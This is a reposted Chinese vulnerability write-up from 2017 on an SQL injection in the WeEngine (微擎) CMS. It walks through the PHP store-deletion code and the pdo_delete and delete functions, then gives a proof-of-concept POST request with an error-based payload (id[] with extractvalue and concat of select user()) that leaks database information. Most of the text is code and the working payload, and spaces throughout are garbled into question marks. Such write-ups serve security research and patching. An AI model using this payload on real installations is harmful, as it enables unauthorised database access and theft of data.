鸿 网 互 联 www.68idc.cn

微擎普通用户权限SQL注入漏洞(2)

来源:互联网 作者:佚名 时间:2017-08-18 11:13
/web/source/mc/store.ctrl.php if($do?=='delete')?{$count?=?pdo_fetchcolumn('SELECT?COUNT(*)?FROM?'?.?tablename('activity_clerks')?.?'?WHERE?uniacid?=?:uniacid?AND?storeid?=?:id',?array(':id'?=?$_GPC['id'],?':uniacid'?=?$_W['uniacid']));$co
/web/source/mc/store.ctrl.php

if($do?=='delete')?{
	$count?=?pdo_fetchcolumn('SELECT?COUNT(*)?FROM?'?.?tablename('activity_clerks')?.?'?WHERE?uniacid?=?:uniacid?AND?storeid?=?:id',?array(':id'?=>?$_GPC['id'],?':uniacid'?=>?$_W['uniacid']));
	$count?=?intval($count);
	if($count?>?0)?{
		message("该门店下有{$count}名店员.请将店员变更到其他门店后,再进行删除操作",?referer(),?'error');
	}
	pdo_delete('activity_stores',array('id'?=>?$_GPC['id'],?'uniacid'?=>?$_W['uniacid']));
	message('删除成功',referer(),?'success');
}

发现其中对id的获取直接带入pdo_delete中进行操作。查看下pdo_delete怎么进行的

function?pdo_delete($table,?$params?=?array(),?$glue?=?'AND')?{
	return?pdo()->delete($table,?$params,?$glue);
}

再继续查看下delete函数

	public?function?delete($table,?$params?=?array(),?$glue?=?'AND')?{
		$condition?=?$this->implode($params,?$glue);
		$sql?=?"DELETE?FROM?"?.?$this->tablename($table);
		$sql?.=?$condition['fields']???'?WHERE?'.$condition['fields']?:?'';
		return?$this->query($sql,?$condition['params']);
	}

直接是获取相关参数,直接带入表中进行删除动作。既然delete中没有进行任何的非删除之外的动作。就可以直接注入了。直接上poc

http://127.0.0.1/web/index.php?c=mc&a=store&do=delete
post
id[]=a\&id[]=)?and?extractvalue(1,?concat(0x5c,?(select?user())))--

1

网友评论
<